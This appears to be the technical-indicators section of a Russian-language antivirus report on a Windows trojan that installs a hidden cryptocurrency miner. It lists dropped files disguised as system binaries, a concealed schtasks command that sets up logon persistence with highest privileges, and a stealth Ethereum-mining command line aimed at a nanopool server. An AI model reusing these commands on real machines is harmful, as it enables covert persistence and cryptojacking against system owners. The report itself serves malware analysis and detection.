Техническая информация
- <SYSTEM32>\tasks\services
- %WINDIR%\explorer.exe
- %HOMEPATH%\services.exe
- %APPDATA%\microsoft\inc\sihost32.exe
- '%APPDATA%\microsoft\inc\sihost32.exe'
- '%HOMEPATH%\services.exe'
- '<SYSTEM32>\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"%HOMEPATH%\Services.exe"' & exit' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"%HOMEPATH%\Services.exe"' & exit
- '<SYSTEM32>\schtasks.exe' /create /f /sc onlogon /rl highest /tn "Services" /tr '"%HOMEPATH%\Services.exe"'
- '%WINDIR%\explorer.exe' --response-timeout=30 --farm-retries=30 --pool stratum://`0x3d72df1abd99f0d76a994e01c88ee4b0b5b91f77`.Ciyyzss:paarthurnax.miller@gmail.com@eth-eu1.nanopool.org:9999 --unam-stealth